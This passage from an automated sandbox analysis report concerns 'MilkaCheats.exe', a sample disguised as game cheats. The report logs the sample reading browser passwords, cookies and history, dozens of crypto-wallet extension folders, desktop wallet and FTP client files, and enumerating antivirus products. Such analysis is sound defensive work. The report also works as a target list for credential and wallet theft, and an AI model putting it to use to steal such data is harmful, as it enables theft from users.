              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,0_2_000DE1A7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_000DE2D0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,0_2_000DE3D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_000DE4A5
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000D54FD
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,0_2_000D59C6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_000DDB41
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000DDDE3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000DDE2E
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000DDEC9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_000DDF54
              Source: C:\Users\user\Desktop\MilkaCheats.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C7679 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000C7679
              Source: C:\Users\user\Desktop\MilkaCheats.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: MilkaCheats.exe, 00000001.00000003.1794270469.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794077852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848284074.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\MilkaCheats.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MilkaCheats.exe PID: 6428, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: MilkaCheats.exeString found in binary or memory: Wallets/Electrum
              Source: MilkaCheats.exeString found in binary or memory: Wallets/ElectronCash
              Source: MilkaCheats.exeString found in binary or memory: Jaxx Liberty
              Source: MilkaCheats.exeString found in binary or memory: window-state.json
              Source: MilkaCheats.exeString found in binary or memory: ExodusWeb3
              Source: MilkaCheats.exe, 00000001.00000002.1848395056.00000000012F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: MilkaCheats.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: MilkaCheats.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
